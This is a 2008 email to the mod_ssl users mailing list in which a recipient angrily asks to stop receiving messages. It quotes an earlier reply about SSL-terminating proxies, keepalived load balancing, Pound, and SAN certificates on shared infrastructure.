To: modssl-users@modssl.org
Subject: wrong e-mail !!!!!!!!!!!!!!!!!!!!!!!
Date: Mon, 14 Jul 2008 18:10:12 +0000
Message-Id: <071420081810.22034.487B9684000ACF8F0000561222218675169B0A02D2089B9A019C04040A0DBFCFCD0E05079D0A@att.net>
In-Reply-To: <487752EE.3020701@w3works.com>
References: <410-220087410202352796@thepinc.com>
 <4877124F.40604@werum.de>
 <4877138E.70608@gmail.com>
 <48772E49.2050107@werum.de>
 <48773992.2080705@gmail.com>
 <487752EE.3020701@w3works.com>
X-Mailer: AT&T Message Center Version 1 (Jun 10 2008)
X-Authenticated-Sender: ZXJpa2EyMEBiZWxsc291dGgubmV0
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="NextPart_Webmail_9m3u9jl4l_22034_1216059012_0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: erika20@bellsouth.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--NextPart_Webmail_9m3u9jl4l_22034_1216059012_0
Content-Type: text/plain
Content-Transfer-Encoding: 8bit

stop stop  sending me 
this bs , i have no idea  who are you !!!!
stop !!!!!!!!!!!!!!!
-------------- Original message from Dave Paris : -------------- 


> It seem like you might be confusing "shared infrastructure" with 
> "single ip". As others have said, you need a distinct address for each 
> SSL-enabled httpd or proxy, although they can reside on the same hardware. 
> 
> A good example of this is the typical configuration for larger server 
> farms. You find multiple High Availability load balancers in the DMZ for 
> both http and https using something like ha/keepalived for linux. These 
> proxy the incoming request back into private address space. The SSL 
> proxies terminate the SSL connection and broker the request on behalf of 
> the user and everything goes to the private address space in plain http. 
> This allows each of the _real_ webservers to achieve better 
> performance since the SSL overhead is not present. 
> 
> While you can use Apache as an SSL-terminating proxy, I find I get 
> better performance, lower memory utilization and easier configuration 
> using Pound ( http://www.apsis.ch/pound/ ). Using keepalived, I have 
> multiple public IP addresses floating between several hosts and pound 
> binds https to those addresses. 
> 
> Hope that adds a bit of additional clarity, 
> Dave 
> 
> Cuesta Gilles sent forth: 
> > So what about this ? 
> > "*MULTIPLE CN (SAN) SERVER CERTIFICATES* 
> > 
> > This type of certificate (also called /Subject Alternative Name/ (SAN) ) 
> > enables to secure not only one website but a large number of sites (a 
> > list of sites) hosted on a shared infrastructure (server with multiple 
> > names, reverse proxy). Ideal to secure multiple brands of a corporation. 
> > One certificate per hardware is required." 
> > 
> > http://www.tbs-certificats.com/index.html.en 
> > 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org 
> User Support Mailing List modssl-users@modssl.org 
> Automated List Manager majordomo@modssl.org 

--NextPart_Webmail_9m3u9jl4l_22034_1216059012_0
Content-Type: multipart/related; boundary="NextPart_Webmail_9m3u9jl4l_22034_1216059012_1"


--NextPart_Webmail_9m3u9jl4l_22034_1216059012_1
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable